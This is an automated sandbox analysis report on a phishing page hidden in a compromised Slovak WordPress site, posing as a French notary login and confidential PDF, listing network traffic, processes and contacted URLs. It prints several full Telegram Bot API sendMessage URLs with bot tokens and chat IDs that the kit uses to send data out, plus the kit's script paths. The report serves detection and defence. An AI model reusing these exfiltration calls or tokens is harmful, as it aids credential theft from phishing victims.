Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png HTTP/1.1Host: www.askozvar.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic DNS traffic detected: DNS query: www.askozvar.sk
Source: global traffic DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic DNS traffic detected: DNS query: dancinggorillas.com
Source: global traffic DNS traffic detected: DNS query: code.jquery.com
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 22:35:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.askozvar.sk/wp-json/>; rel="https://api.w.org/"Upgrade: h2Connection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: chromecache_86.2.dr, chromecache_79.2.dr String found in binary or memory: http://opensource.org/licenses/MIT).
Source: chromecache_72.2.dr, chromecache_74.2.dr String found in binary or memory: http://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf
Source: chromecache_75.2.dr String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: chromecache_77.2.dr String found in binary or memory: https://api.telegram.org/bot
Source: chromecache_75.2.dr String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Source: chromecache_75.2.dr String found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
Source: chromecache_75.2.dr String found in binary or memory: https://dancinggorillas.com/style/pdf_fr.js
Source: chromecache_70.2.dr String found in binary or memory: https://drive.google.com/file/d/1eNHvaGM65gZPNQetBmCc0X9V14ygIJ9J/view
Source: chromecache_75.2.dr String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4gaVI
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4iaVI
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4jaVI
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVI
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVI
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVI
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4uaVI
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4vaVI
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x5OaVI
Source: chromecache_66.2.dr String found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x5caVI
Source: chromecache_84.2.dr, chromecache_82.2.dr, chromecache_65.2.dr String found in binary or memory: https://getbootstrap.com)
Source: chromecache_71.2.dr, chromecache_76.2.dr String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_84.2.dr, chromecache_71.2.dr, chromecache_82.2.dr, chromecache_65.2.dr, chromecache_76.2.dr String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_84.2.dr, chromecache_71.2.dr, chromecache_82.2.dr, chromecache_76.2.dr String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_75.2.dr String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
Source: chromecache_75.2.dr String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Source: chromecache_75.2.dr String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: classification engine Classification label: mal80.phis.troj.win@16/41@30/14
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,3046680550241277804,4198652153698695934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,3046680550241277804,4198652153698695934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1502053 URL: https://www.askozvar.sk/wp-... Startdate: 31/08/2024 Architecture: WINDOWS Score: 80 27 Antivirus detection for URL or domain 2->27 29 Antivirus / Scanner detection for submitted sample 2->29 31 AI detected phishing page 2->31 33 4 other signatures 2->33 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49623 unknown unknown 6->14 16 192.168.2.5 unknown unknown 6->16 18 3 other IPs or domains 6->18 11 chrome.exe 6->11         started        process5 dnsIp6 20 api.telegram.org 11->20 23 api.telegram.org 149.154.167.220, 443, 49759, 49760 TELEGRAMRU United Kingdom 11->23 25 8 other IPs or domains 11->25 signatures7 35 Uses the Telegram API (likely for C&C communication) 20->35
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.186.68
 www.google.com United States
15169 GOOGLEUS false
104.18.10.207
 maxcdn.bootstrapcdn.com United States
13335 CLOUDFLARENETUS false
88.212.10.20
 www.askozvar.sk Slovakia (SLOVAK Republic)
42841 ANTIKSK true
34.87.236.72
 dancinggorillas.com United States
15169 GOOGLEUS false
151.101.130.137
 code.jquery.com United States
54113 FASTLYUS false
104.18.11.207
 stackpath.bootstrapcdn.com United States
13335 CLOUDFLARENETUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
239.255.255.250
 unknown Reserved
unknown unknown false
151.101.194.137
 unknown United States
54113 FASTLYUS false
104.17.25.14
 cdnjs.cloudflare.com United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.7
192.168.2.4
192.168.2.6
192.168.2.5

Contacted Domains

Name IP Active
www.askozvar.sk 88.212.10.20 true
stackpath.bootstrapcdn.com 104.18.11.207 true
dancinggorillas.com 34.87.236.72 true
code.jquery.com 151.101.130.137 true
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 84.201.210.35 true
cdnjs.cloudflare.com 104.17.25.14 true
maxcdn.bootstrapcdn.com 104.18.10.207 true
www.google.com 142.250.186.68 true
api.telegram.org 149.154.167.220 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot69272958987:AAFFDSiV1sre7Hfr4o84UfSX2g3XwVHFbZPfzU/sendMessage?chat_id=-40519456006&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html false
  • Avira URL Cloud: safe
 unknown
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js false
  • Avira URL Cloud: safe
 unknown
https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js true
  • Avira URL Cloud: phishing
 unknown
https://code.jquery.com/jquery-3.2.1.slim.min.js false
  • URL Reputation: safe
 unknown
https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html true
    		unknown
    https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js false
    • Avira URL Cloud: phishing
    		 unknown
    https://dancinggorillas.com/style/10.js false
    • Avira URL Cloud: safe
    		 unknown
    https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/1.png false
    • Avira URL Cloud: phishing
    		 unknown
    https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js false
    • URL Reputation: safe
    		 unknown
    https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js false
    • URL Reputation: safe
    		 unknown
    https://api.telegram.org/bot608367094314:AAGSbz4P642cuuaj_d54rlDQEtxWui_xUOgw/sendMessage?chat_id=63308924057&text=New_Link%3A%20http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html%2FX911%2Fstyle.php false
    • Avira URL Cloud: safe
    		 unknown
    https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css false
    • URL Reputation: safe
    		 unknown
    https://api.telegram.org/bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html false
    • Avira URL Cloud: safe
    		 unknown
    https://www.askozvar.sk/wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png false
    • Avira URL Cloud: phishing
    		 unknown
    https://dancinggorillas.com/style/pdf_fr.js false
    • Avira URL Cloud: safe
    		 unknown
    https://www.askozvar.sk/favicon.ico false
    • Avira URL Cloud: phishing
    		 unknown